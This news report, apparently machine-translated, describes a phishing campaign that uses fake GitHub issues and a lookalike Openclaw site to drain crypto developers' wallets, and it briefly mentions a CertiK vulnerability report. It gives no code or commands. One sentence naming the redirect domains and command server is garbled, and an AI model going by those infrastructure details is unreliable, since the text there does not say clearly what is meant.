OX Security, which operates in the field of cyber security, has revealed a new phishing campaign targeting crypto developers. It was reported that the attack was carried out through fake Github accounts imitating the Openclaw ecosystem and the developers were contacted directly. It was especially noteworthy that users active in open source projects were targeted.
Reaching Developers with the Promise of Fake Tokens
It was stated that the attackers tagged users by opening “issue” titles in the repositories on Github and claimed that so-called CLAW tokens worth $ 5,000 were earned. The links in the messages lead to a fake web page that closely resembles openclaw.ai. When the wallet connection request on this fake page is approved by the user, malicious transactions are initiated.
Assets Are at Risk After Wallet Connection
In the technical review conducted by Moshe Siman Tov Bustan and Nir Zadok working at OX Security, it was stated that user assets could be emptied after wallet connection. It is considered that the attack was made to appear personalized using social engineering methods, and that it may have specifically targeted users who have previously interacted with Openclaw-related projects.
Infrastructure and Malicious Code Details Revealed
Technical analysis revealed that the attack infrastructure included routing chains and control servers. Users, token-claw[.]watery-compost while redirecting to domain xyz[.]A command and control server hosted at today was detected to be active. It was determined that the malicious JavaScript code collected data such as wallet addresses and transaction details and transmitted it to the attackers.
Researchers stated that a crypto wallet address thought to be linked to the threat actor was also detected. The presence of functions within the code that monitor user behavior and clean local storage data makes it difficult to track the attack.
Although there have been no confirmed cases of victims so far, it is reported that the campaign continues actively. Users are advised not to connect wallets to sites they do not know and to be cautious about unexpected token offers coming through Github.
On the other hand, in a separate report published by Certik, attention was also drawn to “skill scanning” vulnerabilities around the Openclaw system. It was stated that in a sample application examined, there was a vulnerability that could bypass the security layer of the system and that this could be exploited.
Openclaw, as a platform focused on developing artificial intelligence-based agent systems, has become rapidly popular among developers recently. With increasing interest, it seems that such platforms are becoming more attractive targets for cyber attacks.
